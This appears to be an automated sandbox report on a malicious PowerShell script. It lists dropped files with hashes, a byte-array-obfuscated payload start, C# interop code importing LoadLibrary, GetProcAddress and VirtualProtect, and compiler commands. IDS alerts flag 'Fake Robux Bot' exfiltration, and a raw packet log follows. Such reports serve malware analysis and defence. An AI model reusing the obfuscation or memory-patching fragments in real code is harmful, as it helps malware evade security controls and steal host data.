                                                                                  SSDEEP:24:HCe9EujwZY9nsWVEwZHFwKTFjmNII+ycuZhNdakS7PNnqSqd:fjwZ0nsWVEwZGKTRmu1ulda3xqSK
                                                                                  MD5:C319C5E61ECC76B9EF0D7A58EC422016
                                                                                  SHA1:4A75851B9058283AD9710ABA655DC9882FB5FD81
                                                                                  SHA-256:A21D2EF54D7BE58417DF2CC0CE065DAFADC122726E206394E6BB7C77A8B2A5F7
                                                                                  SHA-512:66A8441F580D9A19711B199645A629FD8A630D7FE5BCCFBF71446D8098278E2D560A3468E065A5C148C3BAFB05D547ADB2630F1DC939DAB954078255CEB0B179
                                                                                  Malicious:false
                                                                                  Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP.....................(W.H'E...q..........3.......C:\Users\user\AppData\Local\Temp\RES5818.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.h.v.m.f.b.z.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.0905916708503036
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1ak7Ynqq5PN5Dlq5J:+RI+ycuZhNHakS5PNnqX
                                                                                  MD5:6E0E27F94368A5A80BF9EE6E66439FB3
                                                                                  SHA1:2605359C96A07C6901EEFC64D289778ED348B96E
                                                                                  SHA-256:FDCA1D5E28A87FADBC581730CD435D18313902000479A2A16FB1C3DF53274D43
                                                                                  SHA-512:77A1FA759ADFA7965CD9C804BD14AAC4CEF0765328E6F23B474A84479DBA76CDB379EA8D8BFA0FCEA1946B8D85A26B2FE3AC681228E428AD66E09EBE0B5D3F14
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.4.d.v.a.f.a.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.4.d.v.a.f.a.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text
                                                                                  Category:dropped
                                                                                  Size (bytes):1140
                                                                                  Entropy (8bit):4.751587839856729
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:JjajwGHNw7+qFhL/+PS+oXG4mnF1D7ZTHtws4bx:JjaEGHNw7+Ib+6+oXZIF17Zrtws4bx
                                                                                  MD5:FE35992F552A2057291C867108A5C2EB
                                                                                  SHA1:3359CC35D11E68B353BBF06D03F1A9937E2689EE
                                                                                  SHA-256:C6CD29B3B2981C29538DEB9B4445A10EC4993E93F058621F49E6AE294B4B6D1F
                                                                                  SHA-512:8E639DB3A4696FFD380C495CF816B2571656D51AEA0B3DA75FBFC7151F1DE704FE1508FF61C95FC2AC2EF230FD6FEE48536C074D71F025675103B737128E9DFF
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..public class MyUtilityClass {. // Renamed class for clarity.. // Additional variables. private const string Kernel32Library = "kernel32";. . // Function declarations. [DllImport(Kernel32Library)]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);.. [DllImport(Kernel32Library)]. public static extern IntPtr LoadLibrary(string name);.. [DllImport(Kernel32Library)]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. // Additional method for clarity. public static IntPtr LoadLibraryAndGetProcAddress(string libraryName, string procName) {. IntPtr hModule = LoadLibrary(libraryName);. if (hModule == IntPtr.Zero) {. throw new Exception("Failed to load library: " + libraryName);. }.. IntPtr procAddress = GetProcAddress(hModule, procName);. if (procAddress == In
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (364), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):367
                                                                                  Entropy (8bit):5.193694041232788
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2qLTwi23fIIozxs7+AEszIqLTwi23fIIl:p37Lvkmb6KbwZAIoWZEmwZAIl
                                                                                  MD5:721CC2D194B32C6D119A70CEA96BA42D
                                                                                  SHA1:5E529ACC8CA876B9017C9D1E11484F4B87599805
                                                                                  SHA-256:832E62939FEF0E096A2F01780B575EB4B7D90E9D5F11F173253AC41CE1CC6EC0
                                                                                  SHA-512:49C56F4FAB33C521B2394FD3AF14B42331F16ED97859CDAF82C856BB8A3C602C59AE971B662AD6FCD2F3747FFFF409D69C31547CB0EC9F767A95630563389EF4
                                                                                  Malicious:false
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.0.cs"
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):2.977079682240423
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:6PpLNvhfeRPBFLNKhSJFCXumwYxvV1ulHa37q:gJhfeR5dBuGFK
                                                                                  MD5:CAD3B874AAF7F44EC7651DEA93278B00
                                                                                  SHA1:C06B8107C455D96179352A2A497359DC21ADB4F4
                                                                                  SHA-256:141AE0A2FE76DE08B958FF3AD1EBF45A1821EF2667E011BB6B6DF2F15BBFAB08
                                                                                  SHA-512:3448B0986D13E71E6DF68A98E3BC761FFAC31ACB37DFBE73D6AC1E89DB4BC62629EA06EFB3854A08CFB24BB1EDBB62C1EDEB02D93B85CAF93D771A36538B39CA
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..M........(......~....(....,.r...p.(....s....z..(......~....(....,.r3..p.(....s....z.*..(....*...BSJB............v4.0.30319......l.......#~..$.......#Strings........x...#US.d.......#GUID...t.......#Blob...........W.........%3........................................................................6./.........5.....U.....|......./...../...../.............................Q.=.......... M............ \.$...
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):866
                                                                                  Entropy (8bit):5.29299984145892
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:K8Id3ka6KbwZF5EmwZFAKax5DqBVKVrdFAMBJTH:Hkka6CwZ/EmwZSK2DcVKdBJj
                                                                                  MD5:FC36BE8F47582C8CC937138439C0ED70
                                                                                  SHA1:5CFDA66809905525A2A5E7C494B4C6B56CA5DED4
                                                                                  SHA-256:8C40EB5CFBC1D12401A078220B42EDDF29535AB889991E572082FCAEB4A7C7E8
                                                                                  SHA-512:1102DB93C207EB9940BA1E3FA103F5EFA4619CB507852A66B4A14E1D0EAFF186299ADCDF87C33647BAA9965EB2CFC970AECE26841AE293DAFFF4665D275C39CC
                                                                                  Malicious:false
                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.111307976128935
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0Mak7YnqqFBPN5Dlq5J:+RI+ycuZhNdakS7PNnqX
                                                                                  MD5:CA1BB91EEC802857C84827459A911A71
                                                                                  SHA1:82D5B63265EDB9667FDBF776E0D04A865BCD2315
                                                                                  SHA-256:6805C8BB9CAD5DA5D9E06C071846E46FA618D76B1103FDDE8D0000CC376F68C2
                                                                                  SHA-512:5ED5BA3E132DDF7CC94190247580192A46B124038CD7312D2400E56D2E69FD3632D20C173C34C056A3E94F1012DDCFAFF965097B078388B9DC3F5AB0773012B0
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.h.v.m.f.b.z.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.h.v.m.f.b.z.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text
                                                                                  Category:dropped
                                                                                  Size (bytes):1140
                                                                                  Entropy (8bit):4.751587839856729
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:JjajwGHNw7+qFhL/+PS+oXG4mnF1D7ZTHtws4bx:JjaEGHNw7+Ib+6+oXZIF17Zrtws4bx
                                                                                  MD5:FE35992F552A2057291C867108A5C2EB
                                                                                  SHA1:3359CC35D11E68B353BBF06D03F1A9937E2689EE
                                                                                  SHA-256:C6CD29B3B2981C29538DEB9B4445A10EC4993E93F058621F49E6AE294B4B6D1F
                                                                                  SHA-512:8E639DB3A4696FFD380C495CF816B2571656D51AEA0B3DA75FBFC7151F1DE704FE1508FF61C95FC2AC2EF230FD6FEE48536C074D71F025675103B737128E9DFF
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..public class MyUtilityClass {. // Renamed class for clarity.. // Additional variables. private const string Kernel32Library = "kernel32";. . // Function declarations. [DllImport(Kernel32Library)]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);.. [DllImport(Kernel32Library)]. public static extern IntPtr LoadLibrary(string name);.. [DllImport(Kernel32Library)]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. // Additional method for clarity. public static IntPtr LoadLibraryAndGetProcAddress(string libraryName, string procName) {. IntPtr hModule = LoadLibrary(libraryName);. if (hModule == IntPtr.Zero) {. throw new Exception("Failed to load library: " + libraryName);. }.. IntPtr procAddress = GetProcAddress(hModule, procName);. if (procAddress == In
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (364), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):367
                                                                                  Entropy (8bit):5.243034898824678
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2qLTwi23fydoazxs7+AEszIqLTwi23fydoUA:p37Lvkmb6KbwZYxWZEmwZY8
                                                                                  MD5:B7FEEBFDF5035940A5D1DD8F9B2A7CEE
                                                                                  SHA1:34C5C44D09E423BD368046570DAB806698D611E3
                                                                                  SHA-256:31F775B2AE2C5824D5DDB47D7736A443FCE7FDB58FC707F8B581AE9AE42CBDA8
                                                                                  SHA-512:46A2A77A6CE0F0B8740E72CE6ADA654844625A5C27A9A389ED7F2D69EC1781F5395DD88BA8468E2CADE86B96D1ABDD8B091746099C6A62F1E55A32C00B574140
                                                                                  Malicious:true
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.0.cs"
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):2.984514123317771
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:6jpLNvhfeRPBFLRKhSJlCXumwPvV1ulda3xq:EJhfeR5dVjGfK
                                                                                  MD5:CBA6E41A84F3849DF02DFD04F441AC6B
                                                                                  SHA1:1B90C94AEE60D738BD0BD1A52B446920D2CA5754
                                                                                  SHA-256:D16EEB85D524F9006E1BF0E802B3A8B7EEE2E78C658B6157E2ACB035E5EE5B72
                                                                                  SHA-512:B7FE91E0190B1BAD4139BD944C45D53097A89D1B59B5413C9F0145D845F6A512BF0D94DEFBD2AE9A3E6935D984CD7A11C10E18FA8E404EC5EE9729F6E2724960
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..M........(......~....(....,.r...p.(....s....z..(......~....(....,.r3..p.(....s....z.*..(....*...BSJB............v4.0.30319......l.......#~..$.......#Strings........x...#US.d.......#GUID...t.......#Blob...........W.........%3........................................................................6./.........5.....U.....|......./...../...../.............................Q.=.......... M............ \.$...
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):866
                                                                                  Entropy (8bit):5.313386652069536
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:K8Id3ka6KbwZYGEmwZYpKax5DqBVKVrdFAMBJTH:Hkka6CwZ/EmwZSK2DcVKdBJj
                                                                                  MD5:A13A2C4BBC9BAC39298E0D4AFC1477F7
                                                                                  SHA1:4F77315A9CA03C06482AE0B6DE46C3C20D6F259D
                                                                                  SHA-256:34992F6ABC67584AE3216DF752ECD190937DBA6E53B28E53D418188CE0019E36
                                                                                  SHA-512:9FACE7D65DB3CD0C56F806B79B117BF8B2D0DD608B7CF7D57086C8C86F3C88D038670F9BF8C27783B54072A2428CB5EAF2D87F20E306BC97A4AD8C179A225297
                                                                                  Malicious:false
                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6220
                                                                                  Entropy (8bit):3.7134847035290774
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:GlM4RC2QLgkvhkvCCtKjMa6gkvHNjMa6gkIHP:GlM4z0sKjMXjMI
                                                                                  MD5:82D7828E77510DA029E09C428455ACAC
                                                                                  SHA1:0F3F18D50BD47D4801A22EDF07F8336389CE54D4
                                                                                  SHA-256:CC6E5FB26AA3A543687DEE4371E1135264037E13DE2B1AC3546741D52A9292C2
                                                                                  SHA-512:3CB240929DFBDE7D761C73221EFFE70686A4A66599E4781791481E0B8576B98602BE67701E7BE2BB211D6F3FE2612EC27D40ED8CEA212795AAC027688B3F4260
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ....'GDj...t./.....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj...6N.....9.Q.........t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsGOY.n..........................=...A.p.p.D.a.t.a...B.V.1.....OY.n..Roaming.@......EWsGOY.n...........................T..R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsGOY.n..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsGOY.n...........................h..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsGOY.n....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsGOY.n....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGOY.n................
                                                                                  File type:ASCII text, with very long lines (17986)
                                                                                  Entropy (8bit):3.6458393071035915
                                                                                  TrID:
                                                                                    File name:cr_asm_hiddenz.ps1
                                                                                    File size:25'712 bytes
                                                                                    MD5:5ed9d262e083f101c1467ee317c1bc35
                                                                                    SHA1:b4e9654be8db562cb78fb6c7a7ddc37579205d50
                                                                                    SHA256:7282328d8678600716a8496a2036f00c5b5721a82ffab07998554cf2fad037f3
                                                                                    SHA512:fdf82465e00a438c910f958a9272709b8ed6b63eeea5a6557679c57feec9bba8e2cbf7e944a11277c91ddb8f1078524df674c2bdacf7b09a9add663924932997
                                                                                    SSDEEP:192:bDy2fNXj5GA+uHoM7hMFwpFshbwqUdMg2I:bDy2fNXj5GA+i6Vb3UanI
                                                                                    TLSH:33B245F5B318549FBAC7AF9CC3455252D26DD13123E0594BFBAD881AEACAC535030B2E
                                                                                    File Content Preview:$bytes = @(0x24, 0x00, 0x53, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x72, 0x00, 0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x40, 0x00, 0x22, 0x00, 0x0A, 0x00, 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x53, 0x00, 0x79
                                                                                    Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-15T15:54:04.138632+0200 | 2857658 | ETPRO MALWARE Win32/Fake Robux Bot Registration | 1 | 192.168.2.9 | 49712 | 162.159.138.232 | 443 | TCP
2024-10-15T15:54:18.466022+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.9 | 49722 | 162.159.138.232 | 443 | TCP
2024-10-15T15:54:25.976667+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.9 | 49723 | 162.159.138.232 | 443 | TCP
2024-10-15T15:54:33.914799+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49725 | 104.20.3.235 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Oct 15, 2024 15:54:03.233604908 CEST4971380192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:03.238548994 CEST8049713185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.778142929 CEST44349712162.159.138.232192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.778280020 CEST49712443192.168.2.9162.159.138.232
                                                                                    Oct 15, 2024 15:54:03.779969931 CEST49712443192.168.2.9162.159.138.232
                                                                                    Oct 15, 2024 15:54:03.779984951 CEST44349712162.159.138.232192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.780308008 CEST44349712162.159.138.232192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.785819054 CEST49712443192.168.2.9162.159.138.232
                                                                                    Oct 15, 2024 15:54:03.831396103 CEST44349712162.159.138.232192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.848824978 CEST8049713185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.849620104 CEST4971380192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:03.849637985 CEST8049713185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.849762917 CEST4971380192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:03.854513884 CEST8049713185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.862135887 CEST49714443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:03.862173080 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.862257004 CEST49714443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:03.862519026 CEST49714443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:03.862531900 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.937199116 CEST44349712162.159.138.232192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.938271999 CEST49712443192.168.2.9162.159.138.232
                                                                                    Oct 15, 2024 15:54:03.938302040 CEST44349712162.159.138.232192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.138680935 CEST44349712162.159.138.232192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.138782978 CEST44349712162.159.138.232192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.138861895 CEST49712443192.168.2.9162.159.138.232
                                                                                    Oct 15, 2024 15:54:04.148772001 CEST49712443192.168.2.9162.159.138.232
                                                                                    Oct 15, 2024 15:54:04.506788969 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.506860018 CEST49714443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:04.509041071 CEST49714443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:04.509047031 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.509342909 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.510883093 CEST49714443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:04.551412106 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.637089968 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.637162924 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.637212992 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.637248039 CEST49714443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:04.637259007 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.637346983 CEST49714443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:04.637434959 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.637523890 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.637582064 CEST44349714185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.637662888 CEST49714443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:04.693202019 CEST49714443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:04.822267056 CEST4971580192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:04.827177048 CEST8049715185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:04.828790903 CEST4971580192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:04.829592943 CEST4971580192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:04.834394932 CEST8049715185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:05.442601919 CEST8049715185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:05.446075916 CEST8049715185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:05.446861982 CEST4971580192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:05.446901083 CEST4971580192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:05.451702118 CEST8049715185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:05.472593069 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:05.472637892 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:05.472805977 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:05.508591890 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:05.508608103 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.127039909 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.127227068 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.129297018 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.129303932 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.129558086 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.135330915 CEST49716443192.168.2.9185.199.111.133
                                                                                    Oct 15, 2024 15:54:06.175415993 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.360975981 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.361030102 CEST44349716185.199.111.133192.168.2.9
                                                                                    Oct 15, 2024 15:54:06.361143112 CEST49716443192.168.2.9185.199.111.133
